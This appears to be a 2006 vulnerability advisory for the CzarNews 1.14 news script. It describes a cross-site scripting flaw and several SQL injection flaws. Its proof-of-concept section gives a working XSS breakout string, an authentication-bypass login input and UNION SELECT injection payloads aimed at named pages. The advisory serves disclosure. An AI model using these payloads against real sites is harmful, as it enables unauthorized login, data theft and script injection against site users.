XSS and Multiple SQL Injection in CzarNews

Summary

Vulnerability
XSS and Multiple SQL Injection in CzarNews
Discovered
2006.04.04
Last Update
2006.04.14 Exploitation code published
ID
EV0118
CVE
CVE-2006-1640 CVE-2006-1641
Risk Level
medium
Type
Multiple Vulnerabilities
Status
Unpatched. Vendor notyfied.
Vendor
n/a
Vulnerable Software
CzarNews (http://www.czaries.net/scripts/)
Version
1.14
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple Vulnerabilities found in CzarNews (http://www.czaries.net/scripts/) script.

1. Cross-Site Scripting.

Vulnerable Script: news.php

Parameter email is not properly sanitized. This can be used to post arbitrary HTML or web script code.

Condition: magic_quotes_gpc = off

2. Multiple SQL Injections.

Vulnerable scripts: </p><p>cn_auth.php</p><p>news.php</p>

Parameters usern(cn_auth.php), passw(cn_auth.php), s(news.php), a(dpost.php) are not properly sanitized before being used in SQL queries. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

PoC/Exploit

1. Cross-Site Scripting Example:

URL: http://[host]/news.php?a=1

Post a Comment

Email: ">[XSS]<aaa aaa="

2. SQL Injection Examples:

URL: http://[host]/index.php

Username: ' or 1/*

Password: any

URL: http://[host]/news.php

News Search: zzzz%' union select 1,2,3,4,5,6,7,8,9,10/*

URL: http://[host]/news.php?a=999'%20union%20select%201,2,3,4,5,6,7,8,9,10/*

Solution.

Solution for "XSS and Multiple SQL Injection in CzarNews" is not available. Check vendor's website for updates.